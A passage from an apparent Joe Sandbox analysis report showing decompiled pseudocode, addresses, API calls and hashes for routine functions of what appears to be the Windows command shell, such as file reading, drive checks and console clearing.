						__imp__??_V@YAXPAX@Z(_v28);
						__imp__??_V@YAXPAX@Z(_v564);
						goto L12;
					}
				}
				L2:
				_t46 = _t84;
				goto L3;
			}

0x001bb71b
0x001bb722
0x001bb725
0x001bb72b
0x001bb72d
0x001bb733
0x001bb734
0x001bb739
0x001bb741
0x001bb745
0x001c9d59
0x001bb877
0x001bb889
0x001bb889
0x001bb751
0x001c9d6a
0x00000000
0x00000000
0x001c9d70
0x001c9d78
0x001bb759
0x001bb75e
0x001bb76b
0x001bb773
0x001bb779
0x001bb77f
0x001bb787
0x001bb790
0x001bb793
0x001bb799
0x001bb7a9
0x001bb7c4
0x001bb7e7
0x001bb7ec
0x001c9d83
0x001c9d83
0x001bb7f2
0x001bb7fa
0x001c9d8e
0x001c9d8e
0x001bb811
0x001bb82a
0x001bb82e
0x001bb835
0x001bb88c
0x001bb88c
0x001bb837
0x001bb83f
0x001bb894
0x001bb894
0x001bb858
0x001bb858
0x001bb82e
0x001bb85d
0x001bb863
0x001bb870
0x00000000
0x001bb876
0x001c9d7e
0x001bb757
0x001bb757
0x00000000

APIs

_setjmp3.MSVCRT ref: 001BB739
memset.MSVCRT ref: 001BB77F
memset.MSVCRT ref: 001BB799
??_V@YAXPAX@Z.MSVCRT ref: 001BB863
??_V@YAXPAX@Z.MSVCRT ref: 001BB870

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: memset$_setjmp3
String ID:
API String ID: 4215035025-0
Opcode ID: 28904e0e985a8a860d72ea61f701c9cc47ab0376e4612c0cc7f597b3edd3a8fc
Instruction ID: c1755212cb8829b22e0963437829b13e77e59a91107f01b391845333fd773e6a
Opcode Fuzzy Hash: 28904e0e985a8a860d72ea61f701c9cc47ab0376e4612c0cc7f597b3edd3a8fc
Instruction Fuzzy Hash: C241A171A052689BDB24DBA5DCC4FEEBB78EB94304F0401AEE609A7500DB709E84CF94

Uniqueness

Uniqueness Score: -1.00%

Function 001D8F66 Relevance: 7.6, APIs: 5, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E001D8F66(void* __ecx, int __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				int _v556;
				char _v560;
				void* _v564;
				void _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t31;
				signed int _t55;
				int _t56;
				void* _t66;
				void* _t70;
				int _t71;
				signed int _t74;

				_t69 = __edx;
				_t31 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t31 ^ _t74;
				_v560 = 1;
				_t71 = 0;
				_v556 = 0x104;
				_v564 = 0;
				_t56 = __edx;
				_t70 = __ecx;
				memset( &_v1084, 0, 0x104);
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				if(E001C0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0 || E001C0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0) {
					L13:
					__imp__??_V@YAXPAX@Z(_v28);
					__imp__??_V@YAXPAX@Z();
					return E001C6FD0(_t71, _t56, _v8 ^ _t74, _t69, _t70, _t71, _v564);
				} else {
					_t64 = _v564;
					if(_v564 == 0) {
						_t64 =  &_v1084;
					}
					_t69 = _v556;
					if(E001C2D22(_t64, _v556, _t70) == 0) {
						_t65 = _v28;
						if(_v28 == 0) {
							_t65 =  &_v548;
						}
						_t69 = _v20;
						if(E001C2D22(_t65, _v20, _t56) == 0) {
							_t55 = _v28;
							if(_t55 == 0) {
								_t55 =  &_v548;
							}
							_t66 = _v564;
							if(_t66 == 0) {
								_t66 =  &_v1084;
							}
							__imp___wcsicmp(_t66, _t55);
							asm("sbb esi, esi");
							_t71 =  ~_t55 + 1;
						}
					}
					goto L13;
				}
			}

0x001d8f66
0x001d8f71
0x001d8f78
0x001d8f83
0x001d8f8b
0x001d8f8d
0x001d8f99
0x001d8fa1
0x001d8fa3
0x001d8fa5
0x001d8fad
0x001d8fb5
0x001d8fb9
0x001d8fc5
0x001d8ff1
0x001d9082
0x001d9085
0x001d9092
0x001d90ab
0x001d901a
0x001d901a
0x001d9022
0x001d9024
0x001d9024
0x001d902a
0x001d9038
0x001d903a
0x001d903f
0x001d9041
0x001d9041
0x001d9047
0x001d9052
0x001d9054
0x001d9059
0x001d905b
0x001d905b
0x001d9061
0x001d9069
0x001d906b
0x001d906b
0x001d9073
0x001d907e
0x001d9081
0x001d9081
0x001d9052
0x00000000
0x001d9038

APIs

memset.MSVCRT ref: 001D8FA5
memset.MSVCRT ref: 001D8FC5

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

_wcsicmp.MSVCRT ref: 001D9073
??_V@YAXPAX@Z.MSVCRT ref: 001D9085
??_V@YAXPAX@Z.MSVCRT ref: 001D9092

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: memset$_wcsicmp
String ID:
API String ID: 1670951261-0
Opcode ID: f138410378359a67bf2f060df59e912aa354fc52f6a3b5242227ccaf8bdf5be1
Instruction ID: fc2b625493fbdc646a824541e6d767bf3aa90bf8ec45c2b118a98e4bcfefb3c1
Opcode Fuzzy Hash: f138410378359a67bf2f060df59e912aa354fc52f6a3b5242227ccaf8bdf5be1
Instruction Fuzzy Hash: 35315571A012295BDF24DBA5DC95BEEBB78EB64354F0401AEF905D3241EB34DE80CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001D8E52 Relevance: 7.6, APIs: 5, Instructions: 103
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E001D8E52(intOrPtr __edx, long _a4, DWORD* _a8) {
				void _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* __ecx;
				void _t29;
				long _t38;
				void* _t39;
				signed int _t45;
				long _t46;
				void* _t52;
				void* _t54;
				intOrPtr _t57;
				void _t60;
				long _t61;

				_v16 = _v16 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_push(_t39);
				_push(_t39);
				_v12 = __edx;
				_t54 = 2;
				_t61 = E001B5DB5(_t39, _t54);
				if(_t61 == 0xffffffff) {
					_t52 = 0x6e;
					E001D985A(_t52);
					L2:
					E001D85E9(0, 1);
				}
				_t38 = _a4;
				while(1) {
					_t23 =  &_v8;
					__imp___get_osfhandle(0);
					if(ReadFile( &_v8, _t61, _t38, _a8, _t23) == 0) {
						break;
					}
					_t57 = _v12;
					_t29 = _v8;
					_t60 = _t29;
					_t45 =  *(_t57 + 0x1c);
					if((_t45 & 0x0000c000) == 0) {
						if(_t60 <= 2) {
							L9:
							_t45 = _t45 | 0x00008000;
						} else {
							_t57 = _v12;
							if( *_t38 != 0xfeff) {
								goto L9;
							} else {
								_t45 = _t45 | 0x00004000;
							}
						}
						 *(_t57 + 0x1c) = _t45;
					}
					if(_t60 == 0) {
						_t46 = _v16;
					} else {
						asm("sbb ecx, ecx");
						_t46 = E001D6CEF( ~((_t45 & 0x00008002) - 0x8002) + 1, _t38,  &_v8,  &_v20);
						_t29 = _v8;
						_v16 = _t46;
					}
					if(_t29 == _a8) {
						continue;
					}
					if(_t46 == 0) {
						_t31 = _t29 - _t60;
						__imp___get_osfhandle(1);
						SetFilePointer(_t29 - _t60, _t61, _t31, _t46);
					}
					return _t61;
				}
				 *0x1f3cf0 = GetLastError();
				E001BDB92(_t61);
				_push(0);
				_push( *0x1f3cf0);
				E001BC5A2(_t61);
				goto L2;
			}

0x001d8e5a
0x001d8e5e
0x001d8e65
0x001d8e66
0x001d8e69
0x001d8e6c
0x001d8e72
0x001d8e77
0x001d8e7b
0x001d8e7c
0x001d8e81
0x001d8e86
0x001d8e86
0x001d8e8b
0x001d8e8e
0x001d8e90
0x001d8e99
0x001d8ea9
0x00000000
0x00000000
0x001d8eaf
0x001d8eb2
0x001d8eb5
0x001d8eb7
0x001d8ec0
0x001d8ec5
0x001d8edc
0x001d8edc
0x001d8ec7
0x001d8ecf
0x001d8ed2
0x00000000
0x001d8ed4
0x001d8ed4
0x001d8ed4
0x001d8ed2
0x001d8ee2
0x001d8ee2
0x001d8ee7
0x001d8f10
0x001d8ee9
0x001d8efe
0x001d8f06
0x001d8f08
0x001d8f0b
0x001d8f0b
0x001d8f16
0x00000000
0x00000000
0x001d8f1e
0x001d8f23
0x001d8f27
0x001d8f2f
0x001d8f2f
0x001d8f3d
0x001d8f3d
0x001d8f48
0x001d8f4d
0x001d8f52
0x001d8f54
0x001d8f5a
0x00000000

APIs

_get_osfhandle.MSVCRT ref: 001D8E99
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001D8EA1
_get_osfhandle.MSVCRT ref: 001D8F27
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,00000000,00000000), ref: 001D8F2F

Part of subcall function 001D85E9: longjmp.MSVCRT(001EB8F8,00000001,00000000,001D8DAB,?,?,?,?,00000000,?,00000021,00000000,?,?,?,00000000), ref: 001D865D
Part of subcall function 001D85E9: memset.MSVCRT ref: 001D86B6
Part of subcall function 001D85E9: memset.MSVCRT ref: 001D86E4
Part of subcall function 001D85E9: memset.MSVCRT ref: 001D8712

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001D8F40

Part of subcall function 001BDB92: _close.MSVCRT ref: 001BDBC1

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: memset$File_get_osfhandle$ErrorLastPointerRead_closelongjmp
String ID:
API String ID: 288106245-0
Opcode ID: 7f33f629a2a2d0cdac15b67cb0e57d4c715a3cf74e4e6829746fe8ab155ed90c
Instruction ID: d2e7379e8c88c946417cf27dc80d2faf5748ba04b687d4c7e940c655efb03206
Opcode Fuzzy Hash: 7f33f629a2a2d0cdac15b67cb0e57d4c715a3cf74e4e6829746fe8ab155ed90c
Instruction Fuzzy Hash: B531B371A10204ABDB18EF79D849BBE77B9EB94711F10812BF511D63C0DF749D408B90

Uniqueness

Uniqueness Score: -1.00%

Function 001B5712 Relevance: 7.6, APIs: 5, Instructions: 98
fileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E001B5712(void* __ecx, long __edx, DWORD* _a4, struct _OVERLAPPED* _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v8;
				intOrPtr _v16;
				void* _t19;
				signed int _t26;
				void* _t31;
				void* _t32;
				intOrPtr* _t33;
				signed int _t43;
				intOrPtr _t52;
				void* _t54;
				struct _OVERLAPPED* _t55;
				void* _t58;
				void* _t59;

				_t55 = _a8;
				_t33 = __edx;
				_v8 = 0;
				_t59 = __ecx;
				 *0x1dd5cc = 0;
				__imp___get_osfhandle(0, _t54, _t58, _t32, __ecx, __ecx);
				if(ReadFile(0, __ecx, __edx, _a4, _t55) == 0) {
					L18:
					 *0x1f3cf0 = GetLastError();
					_t19 = E001C0178(E001BDB92(_t59));
					E001BDB92(_a16);
					if(_t19 == 0) {
						DeleteFileW(_a20);
					}
					E001D85E9( *0x1f3cf0, 1);
					asm("int3");
					E001C1040(_v8, _t55, _v16);
					return 0;
				} else {
					_t43 = _t55->Internal;
					if(_t43 == 0) {
						if(GetLastError() == 0x3e3) {
							goto L18;
						} else {
							_t43 = _t55->Internal;
							if(_t43 != 0) {
								goto L2;
							} else {
								 *0x1f3cf0 =  *0x1f3cf0 & _t43;
								_t31 = 0;
							}
							goto L5;
						}
					} else {
						L2:
						_t52 = _a12;
						_t26 =  *(_t52 + 0x1c);
						if((_t26 & 0x0000c000) == 0) {
							if(_t43 < 2 ||  *_t33 != 0xfeff) {
								_t26 = _t26 | 0x00008000;
							} else {
								_t26 = _t26 | 0x00004000;
							}
							 *(_t52 + 0x1c) = _t26;
						}
						if((_t26 & 0x00008002) == 0x8002) {
							E001D6CEF(1, _t33, _t55,  &_v8);
							if(_t55->Internal != _t55->Internal) {
								 *0x1dd5cc = 1;
							}
						}
						_t31 = 1;
						L5:
						return _t31;
					}
				}
			}

0x001b571c
0x001b5726
0x001b5728
0x001b572b
0x001b572d
0x001b5734
0x001b5744
0x001c974a
0x001c9752
0x001c975f
0x001c9769
0x001c9770
0x001c9775
0x001c9775
0x001c9784
0x001c9789
0x001c9792
0x001b583e
0x001b574a
0x001b574a
0x001b574e
0x001c9709
0x00000000
0x001c970b
0x001c970b
0x001c970f
0x00000000
0x001c9715
0x001c9715
0x001c971b
0x001c971b
0x00000000
0x001c970f
0x001b5754
0x001b5754
0x001b5754
0x001b5757
0x001b575f
0x001b577f
0x001b578b
0x001b5795
0x001b5795
0x001b5795
0x001b5790
0x001b5790
0x001b576a
0x001c972e
0x001c9735
0x001c973b
0x001c973b
0x001c9735
0x001b5772
0x001b5773
0x001b5779
0x001b5779
0x001b574e

APIs

_get_osfhandle.MSVCRT ref: 001B5734
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001D896D,00000021,?,?,00000000,?,?,?,?,?,00000000,?,00000021,00000000,?), ref: 001B573C
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 001C96FE
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 001C974A
DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,00000000,00000000), ref: 001C9775

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: ErrorFileLast$DeleteRead_get_osfhandle
String ID:
API String ID: 3588551418-0
Opcode ID: bc3e672584988d063d22e43412f1b51653c52c7cfeaaf0e0335c0fd0ae47e273
Instruction ID: bc2e8387d4f1bcc9142183be3290b23d30bf79d80c5a542cb3ec08280fdb7baa
Opcode Fuzzy Hash: bc3e672584988d063d22e43412f1b51653c52c7cfeaaf0e0335c0fd0ae47e273
Instruction Fuzzy Hash: 4E319F35B10505DBDB18DF25E859BBA776AEB94340B51442EE802D7691DF30DD81CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 001C6A96 Relevance: 7.6, APIs: 5, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E001C6A96(short __ecx) {
				signed int _v8;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				long _v28;
				char _v32;
				int _v36;
				void _v556;
				long _v564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				short _t34;
				short _t35;
				int _t38;
				WCHAR* _t39;
				void* _t50;
				short _t51;
				DWORD* _t52;
				signed int _t54;

				_t22 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t22 ^ _t54;
				_v32 = 1;
				_t52 = 0;
				_v28 = 0x104;
				_v36 = 0;
				_t51 = __ecx;
				memset( &_v556, 0, 0x104);
				if(E001C0C70( &_v556, ((0 | _v32 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					_t34 = 0x3a;
					_v18 = _t34;
					_t35 = 0x5c;
					_v16 = _t35;
					_v14 = 0;
					_v20 = _t51;
					_t38 = GetDriveTypeW( &_v20);
					if(_t38 <= 1) {
						L8:
						_t52 = 1;
					} else {
						if(_t38 != 2 && _t38 != 5) {
							_t39 = _v36;
							if(_t39 == 0) {
								_t39 =  &_v556;
							}
							if(GetVolumeInformationW( &_v20, _t39, _v28,  &_v564, _t52, _t52, _t52, _t52) == 0) {
								if(GetLastError() == 5) {
									goto L8;
								}
							}
						}
					}
				}
				__imp__??_V@YAXPAX@Z();
				return E001C6FD0(_t52, 0x104, _v8 ^ _t54, _t50, _t51, _t52, _v36);
			}

0x001c6aa1
0x001c6aa8
0x001c6ab3
0x001c6ab7
0x001c6ab9
0x001c6ac3
0x001c6ac8
0x001c6acb
0x001c6af1
0x001c6af5
0x001c6af6
0x001c6afc
0x001c6afd
0x001c6b03
0x001c6b0b
0x001c6b0f
0x001c6b18
0x001c6b71
0x001c6b73
0x001c6b1a
0x001c6b1d
0x001c6b24
0x001c6b29
0x001c6b69
0x001c6b69
0x001c6b46
0x001d156d
0x00000000
0x001d1573
0x001d156d
0x001c6b46
0x001c6b1d
0x001c6b18
0x001c6b4f
0x001c6b68

APIs

memset.MSVCRT ref: 001C6ACB

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,-00000001,?,?,00000000), ref: 001C6B0F
GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000), ref: 001C6B3E
??_V@YAXPAX@Z.MSVCRT ref: 001C6B4F

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: memset$DriveInformationTypeVolume
String ID:
API String ID: 285405857-0
Opcode ID: fec8f4d72bbc3390b5e8e8050ee39419e3d7890827418ac4a4911e9f81460358
Instruction ID: b2768a2e33788c1ac312c56bf86a50d56e5176979c75df9af237baf45392fc07
Opcode Fuzzy Hash: fec8f4d72bbc3390b5e8e8050ee39419e3d7890827418ac4a4911e9f81460358
Instruction Fuzzy Hash: CF219F32A01128AADB20DBA4DC89FFFBBB8EF15750F04055EE509E2150DB35DE80CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001C0662 Relevance: 7.6, APIs: 5, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 24%

			E001C0662(signed short** __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t4;
				void* _t6;
				long _t8;
				signed int _t11;
				void* _t12;
				signed int _t15;
				long _t16;
				void* _t17;
				void* _t20;
				void* _t24;
				signed short** _t30;
				void* _t31;
				long _t33;
				void* _t34;
				signed int _t35;

				_push(__ecx);
				_t4 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t4 ^ _t35;
				_push(_t15);
				_t30 = __ecx;
				_t28 = 0x8000;
				_t19 =  *__ecx;
				_t6 = E001BD120( *__ecx, 0x8000, __ecx);
				_t16 = _t15 | 0xffffffff;
				while(1) {
					_t33 = _t6;
					if(_t33 != _t16) {
						break;
					}
					if( *0x1f3cf0 != 2) {
						_t20 = 0x6e;
						E001D985A(_t20);
						goto L12;
					} else {
						_t11 =  *( *_t30) & 0x0000ffff;
						if(_t11 == 0x41 || _t11 == 0x42) {
							_t12 = E001BC5A2(_t19);
							_t24 = 0x2341;
							__imp___getch(0);
							if(_t12 == 3) {
								EnterCriticalSection( *0x1e3858);
								 *0x1dd544 = 1;
								LeaveCriticalSection( *0x1e3858);
								goto L12;
							} else {
								_t19 =  *_t30;
								_t28 = 0x8000;
								_t6 = E001BD120( *_t30, 0x8000, _t24);
								continue;
							}
						} else {
							_push(0);
							_push(0x236c);
							E001BC5A2(_t19);
							L12:
							_t8 = _t16;
						}
					}
					L3:
					_pop(_t31);
					_pop(_t34);
					_pop(_t17);
					return E001C6FD0(_t8, _t17, _v8 ^ _t35, _t28, _t31, _t34);
				}
				__imp___get_osfhandle(0);
				SetFilePointer(_t6, _t33, _t30[2], 0);
				_t8 = _t33;
				goto L3;
			}

0x001c0667
0x001c0668
0x001c066f
0x001c0672
0x001c0675
0x001c0677
0x001c067d
0x001c067f
0x001c0684
0x001c0687
0x001c0687
0x001c068b
0x00000000
0x00000000
0x001ccb84
0x001ccbf6
0x001ccbf7
0x00000000
0x001ccb86
0x001ccb88
0x001ccb8e
0x001ccbac
0x001ccbb2
0x001ccbb3
0x001ccbbc
0x001ccbd6
0x001ccbe2
0x001ccbec
0x00000000
0x001ccbbe
0x001ccbbf
0x001ccbc1
0x001ccbc6
0x00000000
0x001ccbc6
0x001ccb95
0x001ccb95
0x001ccb97
0x001ccb9c
0x001ccbfc
0x001ccbfc
0x001ccbfc
0x001ccb8e
0x001c06a9
0x001c06ac
0x001c06ad
0x001c06b0
0x001c06b9
0x001c06b9
0x001c0699
0x001c06a1
0x001c06a7
0x00000000

APIs

_get_osfhandle.MSVCRT ref: 001C0699
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,001B69F2,?,00000001,?,?,00000000), ref: 001C06A1

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: FilePointer_get_osfhandle
String ID:
API String ID: 1013686580-0
Opcode ID: 6ecb6afe42b40f972517a36bc9fe74f892e05b1ef8dfec9dc7e517f8b21d98eb
Instruction ID: 53db1e4d26fb5616ae157cd67eabeb6329b65894409d0657720386b148021244
Opcode Fuzzy Hash: 6ecb6afe42b40f972517a36bc9fe74f892e05b1ef8dfec9dc7e517f8b21d98eb
Instruction Fuzzy Hash: D211E131204205ABD3286FA9FC4BF7977A9EB64751F20021EF11A976E0CF72ED80C694

Uniqueness

Uniqueness Score: -1.00%

Function 001D7EC0 Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E001D7EC0(void* __ebx, void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v30;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				struct _CHAR_INFO _v36;
				struct _COORD _v40;
				struct _SMALL_RECT _v48;
				signed int _t19;
				union %anon259 _t30;
				void* _t42;
				void* _t49;
				void* _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t50 = __edi;
				_t49 = __edx;
				_t42 = __ebx;
				_t19 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t19 ^ _t53;
				if(E001C0178(_t19 ^ _t53) != 0) {
					_push(__esi);
					_t52 = GetStdHandle(0xfffffff5);
					if(GetConsoleScreenBufferInfo(_t52,  &_v32) != 0) {
						_v40.Y =  ~_v30;
						_v40.X = 0;
						_v48.Left = 0;
						_v48.Bottom = _v30;
						_v48.Right = _v32.dwSize;
						_t30 = 0x20;
						_v36.UnicodeChar = _t30;
						_v36.Attributes = _v32.wAttributes;
						ScrollConsoleScreenBufferW(_t52,  &_v48, 0, _v40,  &_v36);
						_v32.dwCursorPosition = 0;
						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0);
					} else {
						E001C25D9(0x1b3c88);
					}
					_pop(_t51);
				} else {
					E001C25D9(0x1b3c88);
				}
				return E001C6FD0(0, _t42, _v8 ^ _t53, _t49, _t50, _t51);
			}

0x001d7ec0
0x001d7ec0
0x001d7ec0
0x001d7ec0
0x001d7ec8
0x001d7ecf
0x001d7edc
0x001d7eee
0x001d7ef7
0x001d7f06
0x001d7f1a
0x001d7f20
0x001d7f24
0x001d7f2b
0x001d7f35
0x001d7f39
0x001d7f3a
0x001d7f42
0x001d7f54
0x001d7f5f
0x001d7f69
0x001d7f08
0x001d7f0d
0x001d7f12
0x001d7f6f
0x001d7ede
0x001d7ee3
0x001d7ee8
0x001d7f7f

APIs

Part of subcall function 001C0178: _get_osfhandle.MSVCRT ref: 001C0183
Part of subcall function 001C0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001CD6A1), ref: 001C018D

GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 001D7EF1
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 001D7EFE

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: BufferConsoleFileHandleInfoScreenType_get_osfhandle
String ID:
API String ID: 2847887402-0
Opcode ID: fac4bdb43a2e6f80eca6ffa81ee1251df9fa520677bbb6aabdf43bc6363ce24a
Instruction ID: 929ff39b2bae28b2d27f4464e82100176ab7ddccdd911fbfa57d4c997d652c3f
Opcode Fuzzy Hash: fac4bdb43a2e6f80eca6ffa81ee1251df9fa520677bbb6aabdf43bc6363ce24a
Instruction Fuzzy Hash: 9B212C75914209AACB04EFF49D15AFEB7B8EF1C720F10016AF915E3690EB309A81C769

Uniqueness

Uniqueness Score: -1.00%

Function 001C46D8 Relevance: 7.6, APIs: 5, Instructions: 52
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001C46D8() {
				int _t3;
				signed int _t6;
				void* _t7;
				void* _t8;
				signed int _t10;
				signed int _t13;
				signed char* _t15;
				void* _t17;
				void* _t18;

				_t3 = GetConsoleOutputCP();
				 *0x1e3854 = _t3;
				if(GetCPInfo(_t3, 0x1e3840) == 0) {
					_t6 = GetThreadLocale() & 0x000003ff;
					if(_t6 != 0x11) {
						if(_t6 == 4 || _t6 == 0x12) {
							 *0x1e3846 = 0xfe81;
						} else {
							 *0x1e3846 = 0;
						}
					} else {
						 *0x1e3846 = 0xfce09f81;
						 *0x1e384a = 0;
					}
				}
				_t7 = memset(0x1f7f30, 0, 0x100);
				_t18 = _t17 + 0xc;
				if( *0x1e3846 != 0) {
					_t15 = 0x1e3846;
					while(1) {
						_t8 = _t15[1];
						if(_t8 == 0) {
							break;
						}
						_t13 =  *_t15 & 0x000000ff;
						_t10 = _t8 & 0x000000ff;
						if(_t13 <= _t10) {
							_t8 = memset(0x1f7f30 + _t13, 1, _t10 - _t13 + 1);
							_t18 = _t18 + 0xc;
						}
						_t15 =  &(_t15[2]);
						if( *_t15 != 0) {
							continue;
						}
						break;
					}
					return _t8;
				} else {
					return _t7;
				}
			}

0x001c46d8
0x001c46e4
0x001c46f1
0x001ce8be
0x001ce8c7
0x001ce8e5
0x001ce8fb
0x001ce8ed
0x001ce8ed
0x001ce8ed
0x001ce8c9
0x001ce8c9
0x001ce8d3
0x001ce8d3
0x001ce8c7
0x001c4703
0x001c4708
0x001c4712
0x001ce90b
0x001ce910
0x001ce910
0x001ce915
0x00000000
0x00000000
0x001ce917
0x001ce91a
0x001ce91f
0x001ce92e
0x001ce933
0x001ce933
0x001ce936
0x001ce93c
0x00000000
0x00000000
0x00000000
0x001ce93c
0x001ce93f
0x001c4718
0x001c4718
0x001c4718

APIs

GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(001C458C), ref: 001C46D8
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,001E3840), ref: 001C46E9
memset.MSVCRT ref: 001C4703
GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 001CE8B8
memset.MSVCRT ref: 001CE92E

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: memset$ConsoleInfoLocaleOutputThread
String ID:
API String ID: 1263632223-0
Opcode ID: ce66f82a6b1dd1e8f375cb0393b9c3442971a802acb20aee2c5da9f12b4a081e
Instruction ID: bfe33166b61ee4d211dd37653d2ebab89aee5a55c1c865267410473fdf00528b
